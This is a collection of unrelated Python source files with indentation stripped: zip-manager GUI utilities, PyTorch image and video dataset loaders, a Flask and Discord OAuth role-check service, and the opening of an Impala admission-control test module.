"""Save the current session in a JSON file."""
self.__processeFileManager.saveSession()
def __getOS(self):
"""Get the main OS module."""
osName = sys.platform
return self.__osFactory.getOS(osName)()
if __name__ == '__main__':
# Run the manager loop and the UI server in separate threads so both infinite loops can run concurrently
tm = TimeManager()
threadRun = Thread(target=tm.run)
threadRun.start()
threadServer = Thread(target=UIServer.UIServer, args=(tm,))
threadServer.start()
|
Tools.py
|
debugging = False
version = 4.2
import time, tempfile, os, json, sys, darkdetect, webbrowser, subprocess
from threading import Thread
from sys import platform as _platform
from PySide2 import QtWidgets, QtCore, QtGui
from ast import literal_eval
if(len(sys.argv)>1):
zip = sys.argv[1]
if('debug' in zip):
debugging=True
realpath = ""
dataToLog = []
app = None
tempDir = tempfile.TemporaryDirectory()
defaultSettings = {
"default_algorithm": "Deflated",
"default_level": 5,
"create_subdir": True,
"mode": "auto",
"autoCheckForUpdates": True,
"plainAppearance": _platform=="darwin"
}
settings = defaultSettings.copy()
if hasattr(sys, 'frozen'):
realpath = sys._MEIPASS
else:
realpath = '/'.join(sys.argv[0].replace("\\", "/").split("/")[:-1])
def getPath(file):
return os.path.join(os.path.join(realpath, "res"), file).replace("\\", "/")
baseStyleSheet = """
QLabel, QPushButton, QTreeView {font-size: 11px;}
"""
if(_platform=="darwin"):
baseStyleSheet += """QTabBar::tab {
padding: 5px;
}
QTabBar::tab:hover{background-color: #0E7AFE;
}
QTabBar::tab:selected{background-color: #0E7AFE;
}
QTabBar:tab:first{border-top-left-radius: 5px;border-bottom-left-radius: 5px;}
QTabBar:tab:last{border-top-right-radius: 5px;border-bottom-right-radius: 5px;}
QTabBar:tab:only-one{border-radius: 5px;}
"""
def setMainApp(newApp: QtWidgets.QApplication):
global app
app = newApp
def log(s: str, force: bool = False) -> None:
global debugging
timePrefix = time.strftime('[%H:%M:%S] ', time.gmtime(time.time()))
dataToLog.append(timePrefix+str(s))
log(f"[ OK ] REALPATH set to \"{realpath}\"")
def logToFileWorker() -> None:
print(f"[##:##:##] [ OK ] File thread started on temp folder {tempDir.name}")
while True:
if len(dataToLog)>0:
try:
with open(tempDir.name.replace('\\', '/')+'/log.txt', "a+", errors="ignore") as log:
try:
if(debugging or "WARN" in str(dataToLog[0]) or "FAILED" in str(dataToLog[0])):
print(dataToLog[0])
log.write(dataToLog[0]+"\n")
except Exception as e:
log.write(f"!--- An error occurred while saving line, missing log line ---! ({e})\n")
del dataToLog[0]
except NotADirectoryError:
pass
else:
time.sleep(0.01)
def openLog() -> None:
log("[ ] Opening log...")
openOnExplorer(tempDir.name.replace('\\', '/')+'/log.txt', force=True)
def openOnExplorer(file: str, force: bool = True) -> None:
if (_platform == 'win32'):
try:
subprocess.run('start explorer /select,"{0}"'.format(file.replace("/", "\\")), shell=True)
except:
log("[ WARN ] Unable to show file {0} on file explorer.".format(file))
elif (_platform == 'darwin'):
if(force):
try:
os.system('open "'+file+'"')
except:
log("[ WARN ] Unable to show file {0} on finder.".format(file))
else:
try:
os.system("open "+("/".join(str(file).split("/")[:-1])))
except:
log("[ WARN ] Unable to show file {0} on finder.".format(file))
elif (_platform == 'linux' or _platform == 'linux2'):
try:
Thread(target=os.system, args=("xdg-open "+file,), daemon=True).start()
except:
log("[ WARN ] Unable to show file {0} on default file explorer.".format(file))
class CheckModeThread(QtCore.QThread):
refreshTheme = QtCore.Signal()
shouldBeRunning = True
def __init__(self):
super().__init__()
self.setTerminationEnabled(True)
def run(self) -> None:
log("[ INFO ] New theme check thread spawned")
lastModeWasLight = darkdetect.isLight()
while self.shouldBeRunning:
if(lastModeWasLight!=darkdetect.isLight()):
log("[ OK ] Theme changed, emitting signal...")
self.refreshTheme.emit()
lastModeWasLight = darkdetect.isLight()
time.sleep(0.01)
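# --- Usage sketch (hypothetical wiring; the real main window lives outside this module) ---
# checker = CheckModeThread()
# checker.refreshTheme.connect(mainWindow.loadStyleSheet)  # loadStyleSheet is assumed to re-apply the theme
# checker.start()
# ...
# checker.shouldBeRunning = False  # ask the polling loop in run() to exit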
def saveSettings(silent=True, default_algorithm="Deflated", default_level=5, create_subdir=True, mode="auto", plainAppearance=None, autoCheckForUpdates=True) -> bool:
if plainAppearance == None:
plainAppearance = settings["plainAppearance"]
global defaultSettings
try:
os.chdir(os.path.expanduser('~'))
try:
os.chdir('.SomePythonThings')
except FileNotFoundError:
log("[ WARN ] Can't acces .SomePythonThings folder, creating .SomePythonThings...")
os.mkdir(".SomePythonThings")
os.chdir('.SomePythonThings')
try:
os.chdir('Zip Manager')
except FileNotFoundError:
log("[ WARN ] Can't acces Zip Manager folder, creating Zip Manager...")
os.mkdir("Zip Manager")
os.chdir('Zip Manager')
try:
settingsFile = open('settings.conf', 'w')
settingsFile.write(str({
"default_algorithm": default_algorithm,
"default_level":default_level,
"create_subdir":create_subdir,
"mode":mode,
"autoCheckForUpdates": autoCheckForUpdates,
"plainAppearance": plainAppearance,
}))
settingsFile.close()
log("[ OK ] Settings saved successfully")
return True
except Exception as e:
log('[ ] Creating new settings.conf')
saveSettings()
if(debugging):
raise e
return False
except Exception as e:
log("[ FAILED ] Unable to save settings")
if(debugging):
raise e
return False
def openSettings() -> dict:
global defaultSettings
os.chdir(os.path.expanduser('~'))
try:
os.chdir('.SomePythonThings')
try:
os.chdir('Zip Manager')
try:
settingsFile = open('settings.conf', 'r')
settings = json.loads("\""+str(settingsFile.read().replace('\n', '').replace('\n\r', ''))+"\"")
settingsFile.close()
log('[ ] Loaded settings are: '+str(settings))
return literal_eval(settings)
except Exception as e:
log('[ ] Creating new settings.conf')
saveSettings()
if(debugging):
raise e
return defaultSettings
except FileNotFoundError:
log("[ WARN ] Can't acces Zip Manager folder, creating settings...")
saveSettings()
return defaultSettings
except FileNotFoundError:
log("[ WARN ] Can't acces .SomePythonThings folder, creating settings...")
saveSettings()
return defaultSettings
try:
readSettings = openSettings()
i = 0
for key in readSettings.keys():
settings[key] = readSettings[key]
i +=1
log("[ OK ] Settings loaded (settings={0})".format(str(settings)))
except Exception as e:
log("[ FAILED ] Unable to read settings! ({0})".format(str(e)))
def winIsLight() -> bool:
mode = darkdetect.isLight()
if(mode!=None):
return mode
else:
return True
def openSettingsWindow(parent):
global settings
settingsWindow = QtWidgets.QMainWindow(parent)
settingsWindow.setFixedSize(400, 350)
settingsWindow.setWindowTitle("SomePythonThings Zip Manager Settings")
settingsWindow.setWindowFlag(QtCore.Qt.WindowMinimizeButtonHint, False)
settingsWindow.setWindowModality(QtCore.Qt.ApplicationModal)
if(_platform == 'darwin'):
settingsWindow.setAutoFillBackground(True)
settingsWindow.setWindowModality(QtCore.Qt.WindowModal)
settingsWindow.setSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
settingsWindow.setWindowFlag(QtCore.Qt.WindowContextHelpButtonHint, False)
settingsWindow.setWindowFlag(QtCore.Qt.WindowCloseButtonHint, False)
layout = QtWidgets.QVBoxLayout()
settingsWindow.setCentralWidget(QtWidgets.QWidget())
settingsWindow.centralWidget().setLayout(layout)
themeSettings = QtWidgets.QGroupBox()
if(_platform=="darwin"):themeSettings.setFixedWidth(345)
themeSettings.setTitle("General")
l = QtWidgets.QFormLayout()
themeSettings.setLayout(l)
modeSelector = QtWidgets.QComboBox()
plainAppearance = CheckBoxAction()
plainAppearance.setChecked(settings["plainAppearance"])
plainAppearance.setText("")
autoUpdate = CheckBoxAction()
autoUpdate.setChecked(settings["autoCheckForUpdates"])
autoUpdate.setText("")
modeSelector.insertItem(0, 'Light')
modeSelector.insertItem(1, 'Dark')
modeSelector.insertItem(2, 'Auto')
l.addRow("Check for updates at startup: ", autoUpdate)
l.addRow("Follow system appearance: ", plainAppearance)
l.addRow("Application theme: ", modeSelector)
layout.addWidget(themeSettings)
compressionSettings = QtWidgets.QGroupBox()
if(_platform=="darwin"):compressionSettings.setFixedWidth(345)
compressionSettings.setTitle("Compression Settings")
l = QtWidgets.QFormLayout()
compressionSettings.setLayout(l)
algorithmSelector = QtWidgets.QComboBox()
algorithmSelector.insertItem(0, 'Deflated')
algorithmSelector.insertItem(1, 'BZIP2')
algorithmSelector.insertItem(2, 'LZMA')
algorithmSelector.insertItem(3, 'Without compression')
l.addRow("Default compression algorithm: ", algorithmSelector)
levelSelector = QtWidgets.QComboBox()
for i in range(1, 10):
levelSelector.insertItem(i, str(i))
levelSelector.setCurrentIndex(settings["default_level"]-1)
l.addRow("Default compression level: ", levelSelector)
layout.addWidget(compressionSettings)
extractionSettings = QtWidgets.QGroupBox()
if(_platform=="darwin"):extractionSettings.setFixedWidth(345)
extractionSettings.setTitle("Extraction Settings")
l = QtWidgets.QFormLayout()
extractionSettings.setLayout(l)
create_subfolder = CheckBoxAction()
create_subfolder.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
create_subfolder.setChecked(settings["create_subdir"])
create_subfolder.setText("Enable/Disable")
l.addRow("Extract files on new folder: ", create_subfolder)
layout.addWidget(extractionSettings)
layout.addStretch()
saveButton = QtWidgets.QPushButton()
saveButton.setText("Save settings and close")
saveButton.clicked.connect(lambda: saveAndCloseSettings(modeSelector, plainAppearance, algorithmSelector, settingsWindow, levelSelector, create_subfolder, parent, autoUpdate))
layout.addWidget(saveButton)
try:
if(settings['mode'].lower() == 'light'):
modeSelector.setCurrentIndex(0)
elif(settings['mode'].lower() == 'auto'):
modeSelector.setCurrentIndex(2)
elif(settings['mode'].lower() == 'dark'):
modeSelector.setCurrentIndex(1)
else:
log("[ WARN ] Could not detect mode!")
except KeyError:
log("[ WARN ] Could not detect mode!")
try:
if(settings['default_algorithm'] == "Deflated"): #the "== False" is here to avoid eval of invalid values and crash of the program
algorithmSelector.setCurrentIndex(0)
elif(settings['default_algorithm'] == "BZIP2"):
algorithmSelector.setCurrentIndex(1)
elif(settings['default_algorithm'] == "LZMA"):
algorithmSelector.setCurrentIndex(2)
elif(settings['default_algorithm'] == "Without Compression"):
algorithmSelector.setCurrentIndex(3)
else:
log("[ WARN ] Could not set default algorithm!")
except KeyError:
log("[ WARN ] Could not set default algorithm!")
settingsWindow.show()
def saveAndCloseSettings(modeSelector: QtWidgets.QComboBox, plainAppearance: QtWidgets.QCheckBox, algorithmSelector: QtWidgets.QComboBox, settingsWindow, levelSelector: QtWidgets.QComboBox, create_subfolder: QtWidgets.QCheckBox, parent, autoUpdate: QtWidgets.QCheckBox):
global settings, forceClose
if(algorithmSelector.currentIndex() == 0):
settings['default_algorithm'] = "Deflated"
elif(algorithmSelector.currentIndex() == 1):
settings['default_algorithm'] = "BZIP2"
elif(algorithmSelector.currentIndex() == 2):
settings['default_algorithm'] = "LZMA"
else:
settings['default_algorithm'] = "Without Compression"
settings["create_subdir"] = create_subfolder.isChecked()
if(modeSelector.currentIndex() == 0):
settings['mode'] = 'light'
elif(modeSelector.currentIndex() == 1):
settings['mode'] = 'dark'
else:
settings['mode'] = 'auto'
settings["plainAppearance"] = plainAppearance.isChecked()
settings["autoCheckForUpdates"] = autoUpdate.isChecked()
parent.loadStyleSheet()
settings["default_level"] = levelSelector.currentIndex()+1
forceClose = True
settingsWindow.close()
saveSettings(silent=True, create_subdir=settings['create_subdir'], default_level=settings['default_level'], default_algorithm=settings['default_algorithm'], mode=settings['mode'], autoCheckForUpdates=settings["autoCheckForUpdates"])
def openHelp() -> None:
webbrowser.open_new("https://github.com/martinet101/SomePythonThings-Zip-Manager/wiki")
def getExtension(file) -> str:
if(len(file.split('.'))==1):
return 'none'
else:
return (file.split('.'))[-1]
def getFileIcon(file) -> QtGui.QIcon:
ext = getExtension(file).lower()
if(ext[-1]=="/"):
return QtGui.QIcon(getPath("folder.ico"))
icon = QtGui.QIcon(QtWidgets.QFileIconProvider().icon(QtCore.QFileInfo(file)).pixmap(48, 48).scaledToHeight(24, QtCore.Qt.SmoothTransformation))
if not(QtGui.QIcon.isNull(icon)):
return icon
def showWindow(window: QtWidgets.QMainWindow) -> None:
window.show()
window.raise_()
window.activateWindow()
if not(window.isMaximized() or window.isFullScreen()):
window.showNormal()
def notify(title: str, text: str, window: QtWidgets.QMainWindow = None) -> None:
if(window):
app.trayIcon.messageClicked.connect(lambda: showWindow(window))
app.trayIcon.activated.connect(lambda: showWindow(window))
try:
app.trayIcon.showMessage(title, text)
except AttributeError:
log(f"[ FAILED ] Unable to show notification!!!\n\tTitle: {title}\n\t Body: {text} ")
def throwInfo(*args) -> None:
app.w.throwInfo(*args)
def throwWarning(*args) -> None:
app.w.throwInfo(*args)
def throwError(*args) -> None:
app.w.throwInfo(*args)
def confirm(*args) -> QtWidgets.QAbstractButton:
return app.w.throwInfo(*args)
class CheckBoxAction(QtWidgets.QWidget):
def __init__(self, parent=None, text: str = "", checked: bool = False):
super().__init__(parent=parent)
self.setLayout(QtWidgets.QHBoxLayout(self))
if not(settings["plainAppearance"]):
if(settings["mode"] == "dark"):
isLight = False
elif(settings["mode"] == "light"):
isLight = True
else:
isLight = winIsLight()
if(isLight):
self.setStyleSheet(f"""
QCheckBox::indicator {{width: 12px;height: 12px;}}
QCheckBox::indicator:checked{{background-color: #058fff;border-radius: 3px;image: url({getPath("checkCheckedBlack.png")});}}
QCheckBox::indicator:indeterminate{{background-color: #058fff;border-radius: 3px;image: url({getPath("checkUnknowndBlack.png")});}}
QCheckBox::indicator:unchecked{{background-color: transparent;border-radius: 3px;image: url({getPath("checkUncheckedBlack.png")});}}""")
else:
self.setStyleSheet(f"""
QCheckBox::indicator {{width: 12px;height: 12px;}}
QCheckBox::indicator:checked{{background-color: #058fff;border-radius: 3px;image: url({getPath("checkCheckedWhite.png")});}}
QCheckBox::indicator:indeterminate{{background-color: #058fff;border-radius: 3px;image: url({getPath("checkUnknowndWhite.png")});}}
QCheckBox::indicator:unchecked{{background-color: transparent;border-radius: 3px;image: url({getPath("checkUncheckedWhite.png")});}}""")
self.label = QtWidgets.QLabel(text)
self.layout().addWidget(self.label)
self.layout().setMargin(1)
self.check = QtWidgets.QCheckBox(self)
self.layout().addWidget(self.check)
self.check.setChecked(checked)
self.check.stateChanged.connect(self.changeText)
self.changeText()
def setText(self, text: str) -> None:
self.label.setText(text)
def setEnabled(self, enabled: bool) -> None:
self.check.setEnabled(enabled)
self.changeText()
def isChecked(self) -> bool:
return self.check.isChecked()
def changeText(self) -> None:
if(self.check.isChecked()):
self.check.setText("Enabled")
else:
self.check.setText("Disabled")
def setChecked(self, value: bool) -> None:
return self.check.setChecked(value)
def setTristate(self, value: bool) -> None:
return self.check.setTristate(value)
if(__name__ == "__main__"):
import __init__
|
datasets.py
|
# Copyright 2020 Lorna Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import glob
import os
import random
import time
from threading import Thread
import cv2
import numpy as np
from PIL import Image
from torch.utils.data import Dataset
class ImageDataset(Dataset):
def __init__(self, root, transform=None, unaligned=False, mode="train"):
self.transform = transform
self.unaligned = unaligned
self.files_A = sorted(glob.glob(os.path.join(root, f"{mode}/A") + "/*.*"))
self.files_B = sorted(glob.glob(os.path.join(root, f"{mode}/B") + "/*.*"))
def __getitem__(self, index):
item_A = self.transform(Image.open(self.files_A[index % len(self.files_A)]))
if self.unaligned:
item_B = self.transform(Image.open(self.files_B[random.randint(0, len(self.files_B) - 1)]))
else:
item_B = self.transform(Image.open(self.files_B[index % len(self.files_B)]))
return {"A": item_A, "B": item_B}
def __len__(self):
return max(len(self.files_A), len(self.files_B))
class VideoDataset:
""" For reading camera or network data
Load data types from data flow.
Args:
dataroot (str): Data flow file name.
image_size (int): Image size in default data flow. (default:``416``).
"""
def __init__(self, dataroot, image_size=416):
self.mode = "images"
self.image_size = image_size
sources = [dataroot]
n = len(sources)
self.images = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print(f"{i + 1}/{n}: {s}... ", end="")
capture = cv2.VideoCapture(0 if s == "0" else s)
assert capture.isOpened(), f"Failed to open {s}"
width = int(capture.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = capture.get(cv2.CAP_PROP_FPS) % 100
_, self.images[i] = capture.read() # guarantee first frame
thread = Thread(target=self.update, args=(i, capture), daemon=True)
print(f"Success ({width}*{height} at {fps:.2f}FPS).")
thread.start()
print("")
def update(self, index, capture):
# Read next stream frame in a daemon thread
num = 0
while capture.isOpened():
num += 1
# Grabs the next frame from video file or capturing device.
capture.grab()
# read every 4th frame
if num == 4:
_, self.images[index] = capture.retrieve()
num = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
raw_image = self.images.copy()
if cv2.waitKey(1) & 0xFF == ord("q"):
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
image = [x for x in raw_image]
# Stack
image = np.stack(image, 0)
# BGR convert to RGB (batch_size 3 x 416 x 416)
image = image[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
# Return a contiguous array
image = np.ascontiguousarray(image)
return image, raw_image
def __len__(self):
return 0
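# --- Usage sketch (assumes a local webcam exposed as source "0") ---
# VideoDataset spawns a daemon thread per source that keeps the latest frame, and
# iterating over it yields (batched RGB array, raw BGR frames); iteration stops when
# 'q' is pressed while an OpenCV window created by the consumer has focus.
#
#     stream = VideoDataset("0")
#     for batch, raw_frames in stream:
#         print(batch.shape)  # (num_sources, 3, height, width) at the camera's native resolution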
|
auth.py
|
from settings import Settings
from flask import Flask, request, redirect
import requests
import discord
from discord.utils import get
import threading
import json
class Oauth(object):
clientId = Settings.clientId
clientSecret = Settings.clientSecret
scope = "identify"
redirectUri = Settings.redirectUri
discordApiUrl = "https://discordapp.com/api"
discordLoginUrl = "{}/oauth2/authorize?client_id={}&redirect_uri={}&response_type=code&scope={}".format(discordApiUrl, clientId, redirectUri, scope)
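# --- Flow sketch (summary of the endpoints below; the "client" naming is illustrative) ---
# 1. The client opens  /auth?sessionId=<id>  -> redirect to Discord's OAuth2 authorize page
#    (Oauth.discordLoginUrl), with the sessionId remembered in a cookie.
# 2. Discord redirects back to  /  with ?code=...  -> the code is stored per sessionId.
# 3. The client polls  /check?sessionId=<id>  -> the code is exchanged for a token, the
#    member's role is verified and the session becomes active.
# 4. The client calls  /end?sessionId=<id>  -> the session is removed again.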
class ServiceResponse(object):
def __init__(self, authorized, critical, response):
self.authorized = authorized
self.critical = critical
self.response = response
def toJson(self):
return json.dumps(self.__dict__)
class DiscordBot(discord.Client):
container = None
isReady = False
async def on_ready(self):
self.isReady = True
print('Logged in as', self.user)
self.loop.create_task(self.container.updateBotStatus())
class AuthApp(Flask):
bot = DiscordBot()
sessionIds = { }
activeSessions = [ ]
nicknames = { }
async def startBot(self):
await self.bot.start(Settings.botToken)
async def updateBotStatus(self):
if self.bot.isReady:
count = len(self.activeSessions)
what = "tester" if count == 1 else "testers"
await self.bot.change_presence(activity = discord.Activity(type = discord.ActivityType.watching, name = "{} {} test".format(count, what)))
def __init__(self, name = None):
self.bot.container = self
self.bot.loop.create_task(self.startBot())
thread = threading.Thread(target = self.bot.loop.run_forever, args = ())
thread.daemon = True
thread.start()
super(AuthApp, self).__init__(name)
app = AuthApp(__name__)
@app.route("/auth", methods = ["get"])
def auth():
if (not app.bot.isReady):
return ServiceResponse(0, 1, "Discord bot not logged in.").toJson()
sessionId = request.args.get("sessionId")[0:256]
if (sessionId == None):
return ServiceResponse(0, 1, "Invalid session ID.").toJson()
resp = app.make_response(redirect(Oauth.discordLoginUrl))
resp.set_cookie("sessionId", value = sessionId)
return resp
@app.route("/", methods = ["get"])
def index():
if (not app.bot.isReady):
return ServiceResponse(0, 1, "Discord bot not logged in.").toJson()
sessionId = request.cookies.get("sessionId")
if (sessionId == None):
return ServiceResponse(0, 1, "Invalid session ID.").toJson()
sessionId = sessionId[0:256]
code = request.args.get("code")
if (code == None):
return ServiceResponse(0, 1, "Invalid request.").toJson()
app.sessionIds[sessionId] = code
#print("{} -> {}".format(sessionId, code))
return "You may now close this page."
@app.route("/check", methods = ["get"])
def check():
if (not app.bot.isReady):
return ServiceResponse(0, 1, "Discord bot not logged in.").toJson()
sessionId = request.args.get("sessionId")[0:256]
if (sessionId in app.activeSessions):
return ServiceResponse(1, 0, app.nicknames[sessionId]).toJson()
if (sessionId == None):
return ServiceResponse(0, 0, "Invalid session ID.").toJson()
if (sessionId not in app.sessionIds):
return ServiceResponse(0, 0, "User not logged in.").toJson()
code = app.sessionIds.pop(sessionId)
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"client_id": Oauth.clientId,
"client_secret": Oauth.clientSecret,
"grant_type": "authorization_code",
"code": code,
"redirect_uri": Oauth.redirectUri,
"scope": Oauth.scope
}
response = requests.post(url = "{}/oauth2/token".format(Oauth.discordApiUrl), data = data, headers = headers)
token = response.json()["access_token"]
headers = {
"Authorization": "Bearer {}".format(token)
}
response = requests.get(url = "{}/users/@me".format(Oauth.discordApiUrl), headers = headers)
user = response.json()
member = get(app.bot.get_all_members(), id = int(user["id"]))
if (member == None):
return ServiceResponse(0, 1, "Member not found.").toJson()
if (get(member.roles, name = Settings.roleName) == None):
return ServiceResponse(0, 1, "Member not in role.").toJson()
if (sessionId not in app.activeSessions):
app.activeSessions.append(sessionId)
app.bot.loop.create_task(app.updateBotStatus())
app.nicknames[sessionId] = user["username"]
return ServiceResponse(1, 0, app.nicknames[sessionId]).toJson()
@app.route("/end", methods = ["get"])
def end():
if (not app.bot.isReady):
return ServiceResponse(0, 1, "Discord bot not logged in.").toJson()
sessionId = request.args.get("sessionId")[0:256]
if (sessionId == None or sessionId not in app.activeSessions):
return ServiceResponse(0, 0, "Invalid session ID.").toJson()
app.activeSessions.remove(sessionId)
app.nicknames.pop(sessionId, None)
app.bot.loop.create_task(app.updateBotStatus())
return ServiceResponse(1, 0, "Goodbye.").toJson()
if __name__ == "__main__":
app.run(debug = False, use_reloader = False, host = "0.0.0.0")
|
test_admission_controller.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Tests admission control
import itertools
import logging
import os
import pytest
import re
import shutil
import sys
import threading
from copy import copy
from time import sleep, time
from beeswaxd.BeeswaxService import QueryState
from tests.beeswax.impala_beeswax import ImpalaBeeswaxException
from tests.common.custom_cluster_test_suite import CustomClusterTestSuite
from tests.common.environ import build_flavor_timeout, ImpalaTestClusterProperties
from tests.common.impala_test_suite import ImpalaTestSuite
from tests.common.resource_pool_config import ResourcePoolConfig
from tests.common.skip import (
SkipIfS3,
SkipIfABFS,
SkipIfADLS,
SkipIfEC,
SkipIfNotHdfsMinicluster,
SkipIfOS)
from tests.common.test_dimensions import (
create_single_exec_option_dimension,
create_uncompressed_text_dimension)
from tests.common.test_vector import ImpalaTestDimension
from tests.hs2.hs2_test_suite import HS2TestSuite, needs_session
from tests.util.web_pages_util import (
get_num_completed_backends,
get_mem_admitted_backends_debug_page)
from tests.verifiers.mem_usage_verifier import MemUsageVerifier
from tests.verifiers.metric_verifier import MetricVerifier
from ImpalaService import ImpalaHiveServer2Service
from TCLIService import TCLIService
LOG = logging.getLogger('admission_test')
# The query used for testing. It is important that this query returns many rows
# while keeping fragments active on all backends. This allows a thread to keep
# the query active and consuming resources by fetching one row at a time. The
# where clause is for debugging purposes; each thread will insert its id so
# that running queries can be correlated with the thread that submitted them.
QUERY = " union all ".join(["select * from functional.alltypesagg where id != {0}"] * 30)
# Same query but with additional unpartitioned non-coordinator fragments.
# The unpartitioned fragments are both interior fragments that consume input
# from a scan fragment and non-interior fragments with a constant UNION.
QUERY_WITH_UNPARTITIONED_FRAGMENTS = """
select *, (select count(distinct int_col) from alltypestiny) subquery1,
(select count(distinct int_col) from alltypes) subquery2,
(select 1234) subquery3
from (""" + QUERY + """) v"""
# The statestore heartbeat and topic update frequency (ms). Set low for testing.
STATESTORE_RPC_FREQUENCY_MS = 100
# Time to sleep (in milliseconds) between issuing queries. When the delay is at least
# the statestore heartbeat frequency, all state should be visible by every impalad by
# the time the next query is submitted. Otherwise the different impalads will see stale
# state for some admission decisions.
SUBMISSION_DELAY_MS = \
[0, STATESTORE_RPC_FREQUENCY_MS / 2, STATESTORE_RPC_FREQUENCY_MS * 3 / 2]
# The number of queries to submit. The test does not support fewer queries than
# MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES to keep some validation logic
# simple.
NUM_QUERIES = [15, 30, 50]
# Whether we will submit queries to all available impalads (in a round-robin fashion)
ROUND_ROBIN_SUBMISSION = [True, False]
# The query pool to use. The impalads should be configured to recognize this
# pool with the parameters below.
POOL_NAME = "default-pool"
# Stress test timeout (seconds). The timeout needs to be significantly higher for
# slow builds like code coverage and ASAN (IMPALA-3790, IMPALA-6241).
STRESS_TIMEOUT = build_flavor_timeout(90, slow_build_timeout=600)
# The number of queries that can execute concurrently in the pool POOL_NAME.
MAX_NUM_CONCURRENT_QUERIES = 5
# The number of queries that can be queued in the pool POOL_NAME
MAX_NUM_QUEUED_QUERIES = 10
# Mem limit (bytes) used in the mem limit test
MEM_TEST_LIMIT = 12 * 1024 * 1024 * 1024
_STATESTORED_ARGS = ("-statestore_heartbeat_frequency_ms={freq_ms} "
"-statestore_priority_update_frequency_ms={freq_ms}").format(
freq_ms=STATESTORE_RPC_FREQUENCY_MS)
# Name of the subscriber metric tracking the admission control update interval.
REQUEST_QUEUE_UPDATE_INTERVAL =\
'statestore-subscriber.topic-impala-request-queue.update-interval'
# Key in the query profile for the query options.
PROFILE_QUERY_OPTIONS_KEY = "Query Options (set by configuration): "
# The different ways that a query thread can end its query.
QUERY_END_BEHAVIORS = ['EOS', 'CLIENT_CANCEL', 'QUERY_TIMEOUT', 'CLIENT_CLOSE']
# The timeout used for the QUERY_TIMEOUT end behaviour
QUERY_END_TIMEOUT_S = 3
# Value used for --admission_control_stale_topic_threshold_ms in tests.
STALE_TOPIC_THRESHOLD_MS = 500
# Regex that matches the first part of the profile info string added when a query is
# queued.
INITIAL_QUEUE_REASON_REGEX = \
"Initial admission queue reason: waited [0-9]* ms, reason: .*"
# The path to resources directory which contains the admission control config files.
RESOURCES_DIR = os.path.join(os.environ['IMPALA_HOME'], "fe", "src", "test", "resources")
def impalad_admission_ctrl_flags(max_requests, max_queued, pool_max_mem,
proc_mem_limit=None, queue_wait_timeout_ms=None,
admission_control_slots=None, executor_groups=None):
extra_flags = ""
if proc_mem_limit is not None:
extra_flags += " -mem_limit={0}".format(proc_mem_limit)
if queue_wait_timeout_ms is not None:
extra_flags += " -queue_wait_timeout_ms={0}".format(queue_wait_timeout_ms)
if admission_control_slots is not None:
extra_flags += " -admission_control_slots={0}".format(admission_control_slots)
if executor_groups is not None:
extra_flags += " -executor_groups={0}".format(executor_groups)
return ("-vmodule admission-controller=3 -default_pool_max_requests {0} "
"-default_pool_max_queued {1} -default_pool_mem_limit {2} {3}".format(
max_requests, max_queued, pool_max_mem, extra_flags))
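# A minimal sketch (not referenced by any test) showing how the helper above is
# typically used; the pool limits chosen here are illustrative only.
def _example_admission_flag_string():
  """Hypothetical helper: builds impalad args for a pool that admits 1 query, queues up
  to 10, caps pool memory at 1 GB, and runs on impalads with a 2 GB process limit."""
  return impalad_admission_ctrl_flags(
      max_requests=1, max_queued=10, pool_max_mem=1024 * 1024 * 1024,
      proc_mem_limit=2 * 1024 * 1024 * 1024)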
def impalad_admission_ctrl_config_args(fs_allocation_file, llama_site_file,
additional_args="", make_copy=False):
fs_allocation_path = os.path.join(RESOURCES_DIR, fs_allocation_file)
llama_site_path = os.path.join(RESOURCES_DIR, llama_site_file)
if make_copy:
copy_fs_allocation_path = os.path.join(RESOURCES_DIR, "copy-" + fs_allocation_file)
copy_llama_site_path = os.path.join(RESOURCES_DIR, "copy-" + llama_site_file)
shutil.copy2(fs_allocation_path, copy_fs_allocation_path)
shutil.copy2(llama_site_path, copy_llama_site_path)
fs_allocation_path = copy_fs_allocation_path
llama_site_path = copy_llama_site_path
return ("-vmodule admission-controller=3 -fair_scheduler_allocation_path %s "
"-llama_site_path %s %s" % (fs_allocation_path, llama_site_path,
additional_args))
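# Example (sketch only): impalad_admission_ctrl_config_args("fair-scheduler-test2.xml",
# "llama-site-test2.xml") points impalad at the allocation and llama-site files under
# $IMPALA_HOME/fe/src/test/resources. With make_copy=True the "copy-" duplicates are
# used instead, so a test can modify pool configs at runtime without touching the
# originals.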
def log_metrics(log_prefix, metrics):
LOG.info("%sadmitted=%s, queued=%s, dequeued=%s, rejected=%s, "
"released=%s, timed-out=%s", log_prefix, metrics['admitted'], metrics['queued'],
metrics['dequeued'], metrics['rejected'], metrics['released'],
metrics['timed-out'])
def compute_metric_deltas(m2, m1):
"""Returns a dictionary of the differences of metrics in m2 and m1 (m2 - m1)"""
return dict((n, m2.get(n, 0) - m1.get(n, 0)) for n in m2.keys())
def metric_key(pool_name, metric_name):
"""Helper method to construct the admission controller metric keys"""
return "admission-controller.%s.%s" % (metric_name, pool_name)
